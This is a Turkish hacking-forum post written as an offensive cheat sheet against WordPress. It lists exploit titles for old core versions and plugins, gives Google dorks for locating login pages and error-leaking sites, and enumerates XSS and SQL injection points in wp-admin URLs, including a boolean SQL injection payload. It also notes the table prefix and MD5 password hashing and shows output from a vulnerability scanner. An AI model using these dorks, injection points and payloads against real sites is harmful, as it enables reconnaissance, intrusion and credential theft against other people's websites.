Yeni mesajlar

JavaScript devre dışı. Daha iyi bir deneyim için, önce lütfen tarayıcınızda JavaScript'i etkinleştirin.

Genel WordPress güvenlik açıkları

Konbuyu başlatan BEYAGU
Başlangıç tarihi 30 May 2016

BEYAGU

Katılımcı Üye

30 May 2016

#1

Vulnerabilities:

Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)

Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability

Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability

1.4*
Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability

Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability

Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability

1.5.1.*
Wordpress <= 1.5.1.3 Remote Code Execution eXploit (****sploit)

Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit

Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit

WordPress <= 1.5.1.1 SQL Injection Exploit

WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

2.0.*
WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit

Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit

Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit

2.1.*
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

2.*
Wordpress <= 2.x dictionnary & Bruteforce attack

WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit

dork:
Code:
"is proudly powered by WordPress"
intext:"Warning: main" inurl:Wp ext

hp
inurl:wp-login.php Register Username Password -echo -trac
inurl:"wp-admin" config -cvs -phpxref
inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
Powered by Wordpress 1.2
intext:"proudly powered by WordPress" filetype

hp
intext:"powered by WordPress" filetype

hp -dritte-seite
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
ext

hp inurl:"wp-login.php" -cvs

Full path disclosure:

WordPress < 1.5.2

Cross-site Scripting:
/wp-login.php?action=login&redirect_to=[XSS]
/wp-admin/templates.php?file=[XSS]
/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS]
http://www.example.com/wp-admin/templates.php?file=[XSS]
http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
http://www.example.com/wp-admin/link-add.php?name=[XSS]
http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
http://www.example.com/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS]

SQL injection examples:
http://www.example.com/index.php?m=[SQL]
http://www.example.com/wp-admin/edit.php?m=[SQL]
http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit
http://www.example.com/index.php?cat=100) or 0=0 or (0=1

Tables/Prefix_/Columns:
wp_

Hash algorithms:
md5(password)

WordPress Vulnerability Scanner
Code:
$ perl -x wp-scanner.pl http://testblog/wordpress/

WordPress Scanner starting: David Kierznowski (Michael Daw - On Security)

Using plugins dir: wp-content/plugins

[*] Initial WordPress Enumeration
[*] Finding WordPress Major Version
[*] Testing WordPress Template for XSS

WordPress Basic Results

wp-commentsrss2.php => Version Leak: WordPress 2.1.3
wp-links-opml.php => Version Leak: WordPress 2.1.3
wp-major-ver => Version 2.1
wp-rdf.php => Version Leak: WordPress 2.1.3
wp-rss.php => Version Leak: WordPress 2.1.3
wp-rss2.php => Version Leak: WordPress 2.1.3
wp-server => Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
wp-title => Test Blog
wp-version => WordPress 2.1.3
x-Pingback => http://testblog/wordpress/xmlrpc.php

WordPress Plugins Found

wp-plugins[0] => Akismet
Download

Cevap yazmak için giriş yap yada kayıt ol.

Paylaş:

Facebook Twitter Telegram Reddit E-posta Link

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.